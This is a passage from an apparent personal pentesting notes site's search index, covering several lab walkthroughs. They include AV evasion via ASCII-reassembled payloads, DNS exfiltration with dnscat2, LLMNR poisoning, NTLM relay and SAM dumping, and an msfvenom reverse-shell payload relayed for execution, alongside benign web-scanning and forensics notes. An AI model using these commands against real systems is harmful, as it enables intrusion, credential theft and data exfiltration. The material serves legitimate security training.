SPIDERMAN machine through python webserver\n# in kali python3 -m http.server 8000 Open up SPIDERMAN and open command prompt as admin, then use these commands: C:\\Users\\peterparker\u0026gt; powershell PS C:\\Users\\peterparker\u0026gt; Invoke-WebRequest -Uri http://172.30.1.50:8080/ vncviewer.cmd -OutFile C:\\Users\\peterparker\\Downloads\\vncviewer.cmd Disable Windows Defender real-time protection on Windows to allow the ASCII file to reassemble into its original form. During the reassembly of the file, Windows Defender may detect it as a potentially dangerous file and block it. 5. Execute vncviewer.cmd file,You’ll begin to notice the reassembling of the ASCII code into an executable file\nC:\\Users\\peterparker\\Downloads\u0026gt; .\\vncviewer.cmd Once the reassembly is done, execute the .exe You should get a session back Now we will perform the same data exfil inside the Blue vm but remotely, not accessing the GUI:\nGet a meterpreter shell first. Move to the root dir of the machine. Upload the vncviewer.cmd and vncviewer.exe Then open a shell to check both files are present. Then execute first the .cmd file using the command vncviewer.cmd: It will start reassembling the binary. It will complete by giving this output: Make sure your multi handler is running on a different tab. Then execute the .exe You will get a session back: After compromising the system and obtaining a shell , use post/multi/recon/local_exploit_suggester module to enable Metasploit to check whether the compromised system is vulnerable to other exploitation modules. To enumerate and decrypt the Local Security Authority (LSA) secret keys from the registry of the compromised system, use the following commands: Having completed this exercise, you have learned how to convert a malicious payload into ASCII to reduce threat detection and evade security sensors. In the next lab, you will discover how to perform data exfiltration using DNS messages to evade detection. Note Next steps are all failed attempts, if you still want to follow, you can. If you are using the provided lab setup in the first part, these techniques can work. In my case i performed these techniques when i didn\u0026rsquo;t have any proper lab structure and lab build knowledge. I can update the techniques in future.\nExfiltration using PacketWhishper: setting up the environment: On Kali Linux, open Terminal and use the following commands to download the PacketWhisper repository and its compressed ZIP file: git clone https://github.com/TryCatchHCF/PacketWhisper wget https://github.com/TryCatchHCF/PacketWhisper/archive/refs/heads/master.zip 2. You will need to download Python 2.7.18 and install it on THESPIDERMAN virtual machine. To do that i will install that file on kali and transfer it altogether.\nwget https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi 3. Now run the python http server on kali then head over to THESPIDERMAN , open the browser and write your kali ip . Then download the files : Make sure you turned off real time detection before downloading these files, windows AV may interrupt during the download. 4. Then extract the master.zip first. Then setup python 2.7.18 version by running the exe. 5. After the initial setup , let\u0026rsquo;s add python 2.7.18 to env variables path. To do so open search bar and type system variables 6. Open it -\u0026gt; click on Environment Variables -\u0026gt; from system variables tab click on the path \u0026gt; click edit -\u0026gt; click on new and add the python paths into this: changing the DNS settings of windows server 2019: We need to make our KALI VM as the DNS server of this machine. Follow the given screenshot to do so: Confirming that the DNS server has been set. Performing data exfiltration: On Kali Linux, open the Terminal and use the following command to run TCPdump, a command-line packet-capturing tool to collect the DNS messages incoming on the eth2 adapter that’s connected to the 172.30.1.0/24 network: sudo tcpdump -i eth2 -w exfiltration.pcap Next, on THESPIDERMAN machine, create a new text file within the extracted master.zip folder. Name the text file Passwords.txt and insert a few random passwords, as shown: I tried this tool on this separate network it appears to be not working in my case, maybe because it\u0026rsquo;s not my NAT/it needs DNS to google for lookups as my kali doesn\u0026rsquo;t know the DNS lookup addresses.\nNow i will try the same in my NAT network on windows server 2019 machine.\nFailed for windows server 2019 also. Let\u0026rsquo;s start with the execution phase i did:\nLogin as administrator on your target machine, in my case it\u0026rsquo;s windows server 2019 on my NAT network aka PENTEST-NET Then go to the directory of master folder : After that we will use python2 to run the script: python packetwhisper.py 4. Make sure your listener is running. Also make sure you setup the DNS server of your kali ip according to the network interface, in my case rn my target machine is on NAT so i am using class C ip of my kali machine. 5. The packetwhisper main menu will open up, follow the given screenshots for the suitable options: 6. Now onto my listener on kali: 7. Copy the captured traffic file to the packetwhisper directory , wherever you have downloaded it: 8. Then use the following screenshots for further assists, before that change your dir to the packetwhisper dir: 9. Now catout the file, in my case i have received gibberish data: Trying to use dnscat2: Installing dependencies for dnscat2: Open a terminal on kali and follow these commands: sudo apt update sudo apt install git ruby-dev build-essential sudo gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ sudo bundle install Install the windows version of dnscat2 by cloning this given git repo: dnscat2-powershell Then start the python http server and transfer the dnscat2 powershell script. Exection: On kali setup the client: cd dnscat2/server sudo ruby ./dnscat2.rb mylab.local --no-cache Then copy this secret Come to the windows machine and run these commands: # Bypass the script blocker for this one time Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process # Run the client .\\dnscat2.ps1 -Domain mylab.local -Secret [the-new-secret-key-from-your-server] You can face some problems just like i faced, try to open the firewall port on kali machine for incoming connections on port 53 using the command sudo ufw allow 53/udp , then check the status using the command sudo ufw status verbose To troubleshoot further issues you can check whether the packets are coming on port 53 or not using the following technique: # on kali run this command: sudo tcpdump -i eth0 -n udp port 53 and src host 192.168.83.140{the target machine\u0026#39;s ip} # on target machine nslookup test.mylab.local 192.168.83.128{kali ip} if error occurs from the target\u0026rsquo;s side: remember to test this technique while your dnscat is running on kali. I WILL LATER ON ADD MORE STUFF ON THESE DNS RELATED ATTACKS. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/03-lateral-movement-and-pivoting/","summary":"\u003ch2 id=\"lateral-movement-and-pivoting\"\u003eLateral Movement and Pivoting:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eLateral movement allows the penetration tester to move further into the targeted network while discovering additional assets and exploiting security vulnerabilities on remote systems with the intent of stealing confidential data and expanding a foothold. Within many organizations, their network is usually segmented with routers and firewalls to prevent cyber-attacks and threats from propagating through their organization. However, there are various host devices that are configured with a dual-homed network connection that simply allows the host to be connected to two different IP networks at the same time.\u003c/li\u003e\n\u003cli\u003eOur target will be \u003ccode\u003eBlue\u003c/code\u003e vm first.\u003c/li\u003e\n\u003cli\u003eFire up the \u003ccode\u003eBlue vm and kali machine\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eExploit it and get a shell using \u003ccode\u003ems17-010\u003c/code\u003e exploit.\u003c/li\u003e\n\u003cli\u003eOn the Meterpreter session, use the arp command to view the entries within the \u003ccode\u003eAddress Resolution Protocol (ARP)\u003c/code\u003e cache of the compromised target. The ARP cache contains a list of \u003ccode\u003eIP-to-MAC\u003c/code\u003e address bindings of all the host devices that recently transmitted a message between themselves and the compromised host:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emeterpreter\u0026gt; arp\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"lm_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/03/lm_1.png\"\u003e\nWe can see that the target machine is on two networks one is NAT aka \u003ccode\u003ePENTEST-NET\u003c/code\u003e(192.168.83.0/24) and another is \u003ccode\u003e172.30.1.0/24(PIVOT-NET)\u003c/code\u003e\n6. Next, use the \u003ccode\u003eipconfig \u003c/code\u003ecommand within Meterpreter to view a list of network adapters and their IP addresses\n\u003cimg alt=\"lm_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/PE/03/lm_2.png\"\u003e\u003c/p\u003e","title":"Lateral Movement and Pivoting"},{"content":"While this section focuses on exploiting the trust of the Active Directory roles and services within a Windows environment, there are several types of attacks, such as pass-the-hash, that exploit the security vulnerabilities found within the protocols of the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite. When we talk about TCP/IP, we are often referring to network-related technologies and devices. However, the protocols within TCP/IP can be found in the operating system and the applications running on a host device as well.\nExploiting LLMNR and NetBios-NS: In many orgs, we will find that they are using windows server as their Domain Controller(ADDS role installed) . Additionally, Active Directory allows IT professionals to use GPOs to assign privileges to end devices and users, thereby creating restrictions to prevent unauthorized activities and actions from occurring in the domain.\nNote When using the Active Directory Domain Service role, by default, it uses LDAP, which is an unsecure directory access protocol.\nWithin a Windows environment, you will commonly find both the Network Basic Input/Output System-Name Service (NetBIOS-NS) and Link-Local Multicast Name Resolution (LLMNR) protocols. NetBIOS-NS is a network protocol and is commonly used on Local Area Networks (LANs) to resolve the hostnames of other devices within the same network. However, NetBIOS has been around for a very long time, and it is considered to be very outdated. While it is now a legacy protocol, it can still be found on many organizations’ internal networks. In modern enterprise networks, with Windows operating systems as clients and servers, you will find that LLMNR is enabled by default where there are no Domain Name System (DNS) servers present or available on the network. LLMNR shares similarities to its predecessor, NetBIOS-NS, as they are both used to resolve hostnames on a network. While in many medium-sized to large corporate networks, there may be one or more internal DNS servers, LLMNR is still enabled by default on Windows operating systems. Both protocols can be exploited for attacks like spoofing and poisoning. Attackers can respond to LLMNR/NetBIOS-NS queries with false information, potentially redirecting traffic to malicious hosts.\nWe will use a tool called Responder to listen for LLMNR, NBT-NS, and DNS messages on a network and will reply to any systems sending these types in the order listed. Responder simply allows Kali Linux to capture these messages and provide a fake response to clients on the network.\nPractical: Fire up kali linux and determine in which interface THEPUNISHER and WINDOWS SERVER 2022 is . In my case it\u0026rsquo;s on 10.11.12.0/24 Run responder using the following command: sudo responder -I eth1 -dPv COMMAND BREAKDOWN:\n-I : specifying the interface to listen and send malicious responses. -d: Enables NetBIOS replies for domain suffix queries on the network. -P / --Proxyauth : Forces NTLM/Basic authentication for the proxy. WPAD/-w option doesn\u0026rsquo;t need to be on. -v : verbose mode. Then open your windows server , press win + R and type out the ip address of your kali machine like this: \\\\kali_ip / you can write anything after the \\\\ like this \\\\fileserver , Windows will not find the file share and send a broadcast message on the network that will be eventually captured by responder . Giving this \\\\kali_ip is called UNC(Universal Name Convention) . Also you will prompted to give your user\u0026rsquo;s credential , provide that also {thanks to -P option}. The moment you will provide the credentials responder will capture the NTLMV1/V2 hash of the password. Save the hash inside a file: Then use hashcat to determine number of NTLM V2 cracking and crack it, follow the steps: we need this one NTLMV2 . Use the following hashcat command for cracking: hashcat -m 5600 hash_file.txt /usr/share/wordlists/rockyou.txt -O 7. To see the cracked password separately use the following command:\nhashcat -m 5600 fcastle_hash.txt /usr/share/wordlists/rockyou.txt --show Important The Windows operating system stores local users’ passwords in the form of NTLM hashes, either NTLMv1 or NTLMv2, depending on the version of Microsoft Windows and its configurations. However, when Windows needs to send these passwords across a network, it uses NTLMv2 and not NTLMv1. Keep in mind that you can perform pass-the-hash techniques using both NTLMv1 and NTLMv2 password hashes on a network. While NTLMv2 is considered more secure, threat actors can still exploit it to perform NTLM Relay and password-cracking attacks to gain unauthorized access to systems on networks.\nNote In a real-world penetration test or red teaming exercise, you will need a dedicated password-cracking system with a dedicated Graphics Processing Unit (GPU) and Hashcat on the host operating system. This enables Hashcat to fully leverage the GPU for offline password cracking. GPUs are highly efficient at performing the types of parallel computations necessary for password cracking, significantly reducing the time required to crack passwords compared to using a CPU alone. This efficiency is due to the architecture of GPUs, which can perform thousands of simple calculations simultaneously.\nHow to Secure Networks against LLMNR / NBT-NS Poisoning Attacks Disable NetBIOS Name Service There appears to be no way to disable NetBIOS Name Service using a GPO, manual instructions are below.\nOpen: Control Panel\\Network and Internet\\Network Connections Right click on the network interface, select properties, double click on “Internet Protocol Version 4 TCP/IPv4“ On the next screen, click advanced, then select the WINS tab Click the radio button next to “Disable NetBIOS over TCP/IP“ Disable LLMNR Start =\u0026gt; Run =\u0026gt; gpedit.msc Open “Local Computer Policy” =\u0026gt; “Computer Configuration” =\u0026gt; “Administrative Templates” =\u0026gt; “Network” =\u0026gt; “DNS Client“ Click on “Turn Off Multicast Name Resolution” and set it to “Enabled Exploiting SMB and NTLMV2 within AD: The Server Message Block (SMB) protocol is a common network protocol that lets devices share resources like files and printers across a network. Within an enterprise network, you will often discover there are many shared network drives mapped to employees’ computers. This allows users to share files across the entire organization easily.\nRetrieving the SAM database: To start, we’ll exploit the trust between Windows hosts on a network and retrieve the contents of the SAM database of a host with SMB. By retrieving the contents of the SAM database, you’ll have access to the usernames and the NTLM hashes of each local user account. You can perform offline password cracking to identify the plaintext passwords for each user or perform pass-the-hash to access other systems on the network that use shared user credentials.\nPower on kali , THEPUNISHER, THESPIDERMAN, Winserver 2022 Run the following NSE command to check for SMB version 2 message signing enabled or not, if enabled then it's required or not : nmap --script smb2-security-mode -p 445 10.11.12.0/24 3. As shown in the screenshot Message signing is not required in THEPUNISHER machine. 4. Next, we will need to use Responder once more. However, this time, we do not want Responder to respond to any SMB and HTTP messages that are sent from clients on the network – only listen for them. Use the following command to open responder.conf file to do some basic changes :\nsudo vim /etc/responder/responder.conf 5. After that run responder as we did earlier: 6. Next, we will be using Impacket to perform an NTLM relay attack by capturing the domain user credentials from THESPIDERMAN and relaying them to THEPUNISHER. This will allow us to capture the user accounts within the SAM database on THEPUNISHER . But there is a catch : there should be a common local user/Domain user/local admin in those 2 devices, then only we can use the captured local admin's hash from THESPIDERMAN to THEPUNISHER , which will help us to dump the SAM file hashes. 7. Use the following command to set the target as THEPUNISHER machine:\nimpacket-ntlmrelayx -t 172.30.1.128 -smb2support # i have put the ip of THEPUNISHER machine 8. NTLM relay attacks are possible when a user account is shared between systems on a network, such as a local user account and even domain users.\nImportant When using the Impacket ntlmrelayx.py script, using the -t syntax allows you to specify a single target. However, in a large organization, you will want to create a text file containing a list of IP addresses for all the host systems that have their SMB security mode set to Message signing enabled and required. This file can be invoked using the -tf command for simplicity during a penetration test.\nIn a real penetration test engagement, you will need to wait for a user to trigger an event on the network. However, within our lab, there are no other users to perform such events. So login to THESPIDERMAN machine as a local user/local admin, i am having a common password between the local admins of both the devices so i will use that account. Once you are logged in, press win + R and type in kali's Ip address just like we did earlier. Now at this moment the SAM dump has been performed and you can see the results in your ntlmrelayx tab: Add the hashes into a file. Use the following command for cleanup the data to get the NTLMV1 hashes: cut -d \u0026#34;:\u0026#34; -f 4 file_name.txt COMMAND BRIEF:\n-d: This syntax specifies the delimiter with quotation marks. For instance, -d \u0026ldquo;:\u0026rdquo; specifies to locate the colon (:) character within the samdump.txt file. -f: This syntax specifies the field to retrieve between the delimiter. For instance, -f 4 specifies to retrieve the fourth section which are the hashes. Cracking the hash: Finding the number for NTLM V1 : hashcat -h | grep NTLM 3. Cracking the hash using the following command:\nhashcat -m 1000 sam_dump_NTLMV1_THEPUNISHER.txt /usr/share/wordlists/rockyou.txt 4. These are the 2 passwords we have cracked till now: Obtaining a reverse shell: We’ll be creating a malicious payload using MSFvenom to gain a reverse shell and using Metasploit to create a listener for capturing the return connection from the victim. Additionally, we’ll be using both Responder and Impacket to capture the responses and perform an NTLM relay attack on the target.\nOpen your Kali, THEPUNISHER, THESPIDERMAN machine. On kali, open msfconsole and start the multihandler with the following commands: sudo msfconsole msf \u0026gt; use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf exploit(multi/handler) \u0026gt; set payload windows/meterpreter/reverse_tcp payload =\u0026gt; windows/meterpreter/reverse_tcp msf exploit(multi/handler) \u0026gt; set AutoRunScript post/windows/manage/migrate AutoRunScript =\u0026gt; post/windows/manage/migrate msf exploit(multi/handler) \u0026gt; set LHOST 172.30.1.130 LHOST =\u0026gt; 172.30.1.130 msf exploit(multi/handler) \u0026gt; set LPORT 1234 LPORT =\u0026gt; 1234 msf exploit(multi/handler) \u0026gt; exploit Make sure you have allowed incoming connections on that LPORT. Now we will make a payload using msfvenom and encode it using shikata_ga_nai with 9 iterations: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.130 LPORT=1234 -f exe -o PUNISHER.exe -e x86/shikata_ga_nai -i 9 Make sure you have given proper LHOST, LPORT according to the multihandler. 5. Start responder on the correct Network adapter\n6. Now we will use ntlmrelayx to relay the local admin\u0026rsquo;s hashes collected from the SPIDERMAN machine and relay it to the PUNISHER machine along with the payload execution, which will give us back a reverse connection:\nimpacket-ntlmrelayx -t 172.30.1.128 -smb2support -e PUNISHER.exe Perform the network trigger by accessing a file share on SPIDERMAN machine. 7. ntlmrelayx will do it\u0026rsquo;s job by creating a service , executing the payload: 8. At this point we should get back a reverse connection on multihandler: EXTRA READING: Security Account Manager: https://www.techtarget.com/searchenterprisedesktop/definition/Security-Accounts-Manager Active Directory Domain Services overview: https://www.techtarget.com/searchenterprisedesktop/definition/Security-Accounts-Manager PowerView command list: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon BloodHound documentation: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon LLMNR/NBT-NS poisoning and SMB relay: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/03-leveraging-network-based-trust/","summary":"\u003cp\u003eWhile this section focuses on exploiting the trust of the Active Directory roles and services within a Windows environment, there are several types of attacks, such as pass-the-hash, that exploit the security vulnerabilities found within the protocols of the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite. When we talk about TCP/IP, we are often referring to network-related technologies and devices. However, the protocols within TCP/IP can be found in the operating system and the applications running on a host device as well.\u003c/p\u003e","title":"Leveraging Network-Based Trust in AD"},{"content":"Whatweb WhatWeb is a tool that is used to help penetration testers easily identify the available technologies and fingerprint web servers and web applications on a target system. Currently i am running OWASP Juice shop, DVWA(on kali) and metasploitable 2. You can run these commands on any of these 3 machines as metasploitable 2 linux also various vulnerable webserver like DVWA, Multidae, Twiki. You can use those but make sure you provide proper directory in the commands.\nDVWA(Damn Vulnerable Web App) setup: Follow this github page\u0026rsquo;s README.md instructions DVWA OWASP juice shop setup: First install docker using the following instructions: curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/dockerarchive-keyring.gpg \u0026gt;/dev/null echo \u0026#39;deb [arch=amd64 signed-by=/usr/share/keyrings/ docker-archive-keyring.gpg] https://download.docker.com/ linux/debian buster stable\u0026#39; | sudo tee /etc/apt/sources. list.d/docker.list sudo apt-get update sudo apt install -y docker-ce docker-ce-cli containerd.io OWASP Juice shop installation steps: sudo systemctl restart docker sudo docker pull bkimminich/juice-shop sudo docker run --rm -p 3000:3000 bkimminich/juice-shop I will be using DVWA and metasploitable 2 on a basic level for this practical\nCommand: whatweb http://localhost/DVWA whatweb 172.30.1.134 # metasploitable2 machine ip To put it simply, WhatWeb provides the following details:\nThe web application and its version The web technologies and their versions The host operating system and its version NMAP for web app scanning: Using nmap http scripts for the web app scan, first we need to see what kind of scripts are available using the following command: ls /usr/share/nmap/scripts/http* 2. From the list, you can choose to use a particular script to check for HTTP vulnerabilities on a target system. Let\u0026rsquo;s imagine that you want to identify whether a target web application is vulnerable to Structured Query Language (SQL) Injection attacks. The http-sql-injection NSE script will be able to identify such security flaws.\nnmap --script http-sql-injection -p 80 172.30.1.134 Tip While many scripts within Nmap can be leveraged to identify vulnerabilities within web applications, it is important to always identify the service version of the web application by simply using the –A syntax when performing an initial scan to profile your target. Once you have identified the web application\u0026rsquo;s service version, use the internet to research known vulnerabilities. As a penetration tester, it\u0026rsquo;s always good to perform additional research on vulnerabilities as you may find more information on how to compromise the target.\nMetasploit for web app scanning: This time we will start by initializing the postgresql db of msfconsole to store the data. Follow the commands for initialization: service postgresql start sudo msfdb init Then start msfconsole To check the connectivity with the database , use the command db_status inside msfconsole Then, use the following command to load the WMAP web vulnerability scanner module within Metasploit: Next, use the wmap_sites –a command to set the target as the OWASP BWA virtual machine IP address, to check if the site is added or not check using wmap_sites -l , to set the target wmap_target -t : To run wmap use the command wmap_run -t, this will automatically load the web scanning modules from metasploit for security testing: Once the web scanning modules have been loaded, use the following commands to perform web security testing on the target web application: Lastly, use the vulns command to see the overall results of the security assessment from WMAP Nikto scanning: Nikto scan command: nikto -h 172.30.1.134 -h : This option allows use to specify target\u0026rsquo;s hostname and IP address.\nYou can read through the entire scan for different vulnerabilities. Scanning with wpscan: While there are many web applications within the e-commerce industry, there are many organizations that deploy the WordPress web application as their preferred Content Management System (CMS).\nWithin Kali Linux, you will learn about the WPScan tool, which allows penetration testers to perform vulnerability scanning and enumeration on the WordPress web application on a target server.\nLet\u0026rsquo;s get started with WPSCAN: wpscan --url http://172.30.1.134:8585/wordpress --no-update The following is a brief description of the syntax:\n--url: Specifies the target URL --no-update: Performs a scan without checking for updates WPSCAN IS APPLICABLE IN SUCH APPLICATIONS WHICH ARE BUILT WITH WORDPRESS ONLY. Next, to enumerate the login username of the target WordPress web application, use the –e u syntax wpscan --url http://172.30.1.134:8585/wordpress --no-update -e u Tip To learn more about WPScan and its capabilities, please see https://tools.kali.org/web-applications/wpscan.\nFurther reading: Web application vulnerability scanners: https://hub.packtpub.com/implementing-web-application-vulnerability-scanners-withkali-linux-tutorial/ Secure web-based applications: https://hub.packtpub.com/why-secureweb-based-applications-with-kali-linux/ ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/03-using-web-application-scanners/","summary":"\u003ch2 id=\"whatweb\"\u003eWhatweb\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eWhatWeb\u003c/code\u003e is a tool that is used to help penetration testers easily identify the available technologies and fingerprint web servers and web applications on a target system.\n\u003cem\u003eCurrently i am running OWASP Juice shop, DVWA(on kali) and metasploitable 2. You can run these commands on any of these 3 machines as metasploitable 2 linux also various vulnerable webserver like DVWA, Multidae, Twiki. You can use those but make sure you provide proper directory in the commands.\u003c/em\u003e\u003c/p\u003e","title":"Using Web Application Scanners"},{"content":"Graphical User Interface for Empire server, useful for collaboration during a pentest. In this section we will be using the main kali linux machine and the target will be same windows server 2019\nCredentials and reporting: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/03-working-with-starkiller/","summary":"\u003cp\u003e\u003cem\u003eGraphical User Interface for Empire server, useful for collaboration during a pentest.\u003c/em\u003e\n\u003cimg alt=\"sk_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_1.png\"\u003e\nIn this section we will be using the main kali linux machine and the target will be same \u003ccode\u003ewindows server 2019\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_2.png\"\u003e\n\u003cimg alt=\"sk_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_3.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_4.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_5.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_6.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_7\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_7.png\"\u003e\n\u003cimg alt=\"sk_8\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_8.png\"\u003e\n\u003cimg alt=\"sk_9\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_9.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_10\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_10.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_11\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_11.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_12\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_12.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_13\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_13.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_14\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_14.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_15\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_15.png\"\u003e\n\u003cimg alt=\"sk_16\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_16.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_17\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_17.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_18\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_18.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sk_19\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_19.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"credentials-and-reporting\"\u003eCredentials and reporting:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"sk_20\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_20.png\"\u003e\n\u003cimg alt=\"sk_21\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/02/sk_21.png\"\u003e\u003c/p\u003e","title":"Working With Starkiller"},{"content":"Volatile data collection: system uptime and current time: In command prompt:\n(date /t) \u0026amp; (time /t) systeminfo | find \u0026#34;Boot Time\u0026#34; In powershell:\n(Get-Date) - (gcim Win32_OperatingSystem).LastBootUpTime Network parameters(NetBIOS name cache, active connections, routing table etc): nbtstat -c netstat -ano netstat -rn ipconfig /all Promiscous mode detection on NICs through powershell:\nGet-NetAdapter | Format-List -Property ifAlias, PromiscuousMode Sysinternal tools: logged on users info: PsLoggedon.exe -x logonsessions.exe -p net sessions net user user_name Hash analysis: Using powershell:\nGet-FileHash .\\FTK_sample_00.E01 -Algorithm MD5 Get-FileHash .\\FTK_sample_00.E01 -Algorithm SHA128 Open file information: net file list of running processes, services: tasklist /svc scheduled tasks info: schtasks /query history checking: doskey /history In powershell:\nGet-History Examining print spool files: cd C:\\Windows\\System32\\spool\\PRINTERS # look for .SPL and .SHD files WMIC: wmic service list brief File shares: net share Non-volatile data collection: File system examination: dir /o:d ESE database view: Install esedatabase view tool from internet -\u0026gt; then open the following dir inside the tool : C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb\nRegistry analysis: Collecting system information: open registry editor Then go to this path: Double click on the right side\u0026rsquo;s ComputerName option to see the name. To see current version of windows -\u0026gt; HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion Last shutdown time information: HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Windows time zone settings -\u0026gt; HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation Share information -\u0026gt; HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Shares Evaluating account management events: win + r -\u0026gt; secpol.msc -\u0026gt; enter -\u0026gt; double click local policies -\u0026gt; click audit policy browser cache analysis: History and cookies location for google chrome: C:\\Users\\{user_name}\\AppData\\Local\\Google\\Chrome\\UserData\\Default cache location: C:\\Users\\{user_name}\\AppData\\Local\\Google\\Chrome\\UserData\\Default\\Cache Note Location is identical for every browser, just choose the proper name of the browser.\n","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/windows-forensics/","summary":"\u003ch2 id=\"volatile-data-collection\"\u003eVolatile data collection:\u003c/h2\u003e\n\u003ch3 id=\"system-uptime-and-current-time\"\u003esystem uptime and current time:\u003c/h3\u003e\n\u003cp\u003e\u003cem\u003eIn command prompt:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"k\"\u003edate\u003c/span\u003e /t\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"p\"\u003e\u0026amp;\u003c/span\u003e \u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"k\"\u003etime\u003c/span\u003e /t\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esysteminfo \u003cspan class=\"p\"\u003e|\u003c/span\u003e find \u003cspan class=\"s2\"\u003e\u0026#34;Boot Time\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"wf_1\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_4/wf_1.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eIn powershell:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"nb\"\u003eGet-Date\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"p\"\u003e-\u003c/span\u003e \u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003egcim\u003c/span\u003e \u003cspan class=\"n\"\u003eWin32_OperatingSystem\u003c/span\u003e\u003cspan class=\"p\"\u003e).\u003c/span\u003e\u003cspan class=\"py\"\u003eLastBootUpTime\u003c/span\u003e  